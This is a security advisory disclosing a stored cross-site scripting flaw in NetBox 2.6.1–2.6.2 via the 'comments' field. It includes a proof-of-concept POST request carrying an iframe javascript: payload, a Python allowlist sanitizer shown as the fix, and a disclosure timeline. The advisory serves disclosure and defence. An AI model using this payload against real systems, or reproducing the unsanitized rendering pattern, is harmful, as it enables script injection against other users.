NetBox versions 2.6.1 - 2.6.2: Cross-Site Scripting vulnerability
31-08-2019
Affected Product: NetBox versions 2.6.1 - 2.6.2
Credits: Vulnerability discovered by Claudio Cinquino
CVE: CVE-2019-25011
Executive Summary
NetBox is vulnerable to stored XSS because user-supplied input is not filtered before it is rendered. Exploitation requires an authenticated user.
Parameter:
name="comments" (affects every page on which this field is present)
PoC
POST /dcim/sites/add/ HTTP/1.1
Host: xxx
User-Agent: xxx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: xxx
Content-Type: multipart/form-data; boundary=---------------------------57052814523281
Content-Length: 2158
Connection: close
Cookie: csrftoken=xxx; sessionid=xxx
Upgrade-Insecure-Requests: 1

-----------------------------57052814523281
Content-Disposition: form-data; name="csrfmiddlewaretoken"

xxxx
<snipped>
-----------------------------57052814523281
Content-Disposition: form-data; name="comments"

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
-----------------------------57052814523281
Content-Disposition: form-data; name="_create"

-----------------------------57052814523281--
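As an added illustration (not NetBox's code, which this advisory does not show), the Python sketch below contrasts the vulnerable pattern of echoing the stored comments value verbatim with an allowlist sanitizer that drops the PoC payload; the allowlist, scheme list and function names are assumptions.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed allowlist for a free-text comments field (not NetBox's own configuration).
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "code", "pre", "ul", "ol", "li", "a"}
ALLOWED_ATTRS = {"a": {"href", "title"}}
SAFE_SCHEMES = {"", "http", "https", "mailto"}  # "" covers relative URLs

# The exact value submitted in the advisory's PoC request.
POC_PAYLOAD = "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>"


class AllowlistSanitizer(HTMLParser):
    """Re-emits only allowlisted tags/attributes; unknown tags are dropped, text is escaped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # <iframe>, <script>, <img onerror=...> never reach the output
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # drops event-handler attributes such as onclick
            if name == "href" and urlparse(value or "").scheme.lower() not in SAFE_SCHEMES:
                continue  # blocks javascript:, data:, vbscript: link targets
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data))  # literal text is always entity-encoded


def render_unsanitized(comment):
    """The vulnerable pattern: stored markup is inserted into the page verbatim."""
    return comment


def render_sanitized(comment):
    parser = AllowlistSanitizer()
    parser.feed(comment)
    parser.close()
    return "".join(parser.out)
```

Running `render_sanitized(POC_PAYLOAD)` yields an empty string, while `render_unsanitized` returns the iframe untouched.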
Disclosure Timeline
31/08/2019 – Vulnerability Discovered
03/09/2019 – Initial vendor notification
09/10/2019 – The vendor fixed the vulnerability
References
[1] https://github.com/netbox-community/netbox/issues/3471